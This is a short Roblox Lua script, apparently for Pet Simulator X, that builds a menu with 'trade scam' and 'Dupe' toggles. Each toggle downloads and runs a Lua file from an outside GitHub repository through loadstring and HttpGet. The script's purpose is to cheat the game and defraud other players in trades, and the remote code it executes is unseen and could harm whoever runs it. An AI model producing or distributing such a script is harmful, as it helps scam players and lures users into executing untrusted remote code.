local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("Scam Psx Script                wait 30 sec than click on", "BloodTheme")
local Tab = Window:NewTab("trade scam")
local Section = Tab:NewSection("trade scam (wait 30-45sec)")
local Section = Tab:NewSection("WAIT 30 SECOND!")
Section:NewToggle("trade scam", "wait 30sec and trade than open trade scam", function(state)
    loadstring(game:HttpGet("https://raw.githubusercontent.com/2Sxnpz/DupeScriptPetSimx/main/.lua"))()
end)
local Tab = Window:NewTab("Dupe")
local Section = Tab:NewSection("Dupe wait 30-45sec and clik open")
local Section = Tab:NewSection("WAIT 30 SECOND!")
Section:NewToggle("Dupe", "wait 30-45sec and trade than open Dupe", function(state)
    loadstring(game:HttpGet("https://raw.githubusercontent.com/2Sxnpz/DupeScriptPetSimx/main/.lua"))()
end)
